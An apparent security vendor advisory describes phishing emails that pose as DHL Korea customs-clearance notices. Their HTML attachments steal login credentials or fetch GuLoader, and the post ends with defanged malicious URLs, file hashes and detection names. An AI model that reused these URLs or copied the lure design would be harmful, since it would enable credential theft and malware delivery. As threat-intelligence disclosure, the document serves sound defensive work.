Emails Impersonating Shipping Companies Distributed as ‘Guide on Submitting Import Clearance Info’

Emails Impersonating Shipping Companies Distributed as ‘Guide on Submitting Import Clearance Info’

ASEC (AhnLab Security Emergency response Center) has recently discovered malicious emails impersonating shipping companies being distributed in Korea. These emails prompt users to open the attached file with the subject ‘Submitting import clearance info’. Considering that the attached HTML’s filename starts with ‘DHL_Korea’, it can be concluded that the email is being distributed to Korean targets.

Figure 1. Original email

This disguised email has a login page in the attached HTML file. When a user logs in this page, an Excel file uploaded to a personal OneDrive cloud storage account is opened.

Figure 2. Login screen disguised as a shipping company’s page

When a user opens the attached HTML, the login page they are connected to leaks the password they enter to the server below.

Figure 3. Information leak address in the HTML web source

  • Information leak address: hxxps://lucent-fittings.000webhostapp[.]com/action.php    

Figure 4. Excel file that is connected through the OneDrive link

After the user attempts to login, they are directed to an Excel file uploaded to a personal OneDrive cloud storage account. However, the Excel file connected to the link cannot be opened because it exceeds the file size limit. The screen that connects to the Excel file was designed to deceive users, making it difficult for users to immediately realize that they were phished after they entered their account credentials.

Figure 5. Original email of the customs clearance status verification request

Similar to the aforementioned ‘Submitting import clearance info’ phishing email, another email that asks for users’ customs clearance verification status was found. When the attachment is opened, a screen that makes users believe they were connected to a PDF file can be seen. The URL connected to the Open button is currently inaccessible, but it has been confirmed that the GuLoader malware was downloaded when the address could be accessed.

Figure 6. Malicious PDF which downloads additional malware (Open button)

Due to the recent distribution of phishing emails related to import clearance, users must be particularly cautious before entering their account credentials or when opening attached files. Currently, V3 products detect and block the files mentioned in this post using the following aliases. [File Detection] 

  • Phishing/HTML.FakeMS.S2082 (2023.01.19.00)
  • Trojan/PDF.Generic (2023.02.10.02)
  • Trojan/Win.GuLoader.C5379004 (2023.02.11.00)

 

MD5

7739ebe59ba934f4887d70e4a4d31d6a
c2b8db7362020b321870e649b05f12fb
e49967b8d499bb593cf44026aa79871b
URL

http[:]//31[.]42[.]184[.]26/PDF[.]gz
https[:]//lucent-fittings[.]000webhostapp[.]com/action[.]php

Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.